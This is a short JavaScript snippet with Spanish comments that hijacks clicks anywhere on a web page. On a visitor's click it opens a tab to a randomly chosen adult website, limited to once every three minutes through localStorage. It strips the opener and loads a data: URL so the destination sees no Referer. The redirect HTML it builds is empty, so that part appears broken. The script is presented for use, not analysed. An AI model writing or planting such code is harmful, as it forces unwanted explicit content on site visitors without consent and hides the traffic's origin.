(function() {
// Lista de sitios web de destino
const sitiosDestino = [
"https://videosxy.net",
"https://goldenshowe.com",
"https://exposedwife.com"
];
const TIEMPO_ESPERA_MS = 3 * 60 * 1000; // 3 minutos
const CLAVE_STORAGE = "ultimo_salto_timestamp";
function ejecutarSalto(e) {
const ahora = Date.now();
const ultimoSalto = localStorage.getItem(CLAVE_STORAGE);
// Control de tiempo (3 minutos)
if (ultimoSalto && (ahora - parseInt(ultimoSalto, 10)) < TIEMPO_ESPERA_MS) {
return;
}
// Seleccionar URL
const urlAleatoria = sitiosDestino[Math.floor(Math.random() * sitiosDestino.length)];
// Abrir pestaña limpia inmediatamente tras la interacción
const nuevaVentana = window.open('about:blank', '_blank');
if (nuevaVentana) {
// Registrar el tiempo solo si la ventana logró abrirse
localStorage.setItem(CLAVE_STORAGE, ahora);
// Eliminar referencia de origen (Referer / opener)
nuevaVentana.opener = null;
// HTML mínimo de redirección rápida sin Referer
const htmlRedireccion = '' +
'' +
'' +
'';
// Cargar el HTML usando el método location de forma aislada
nuevaVentana.location.href = 'data:text/html;charset=utf-8,' + encodeURIComponent(htmlRedireccion);
}
}
// Escuchar el clic sobre el documento sin bloquear otros scripts de la página
document.addEventListener("click", ejecutarSalto, false);
})();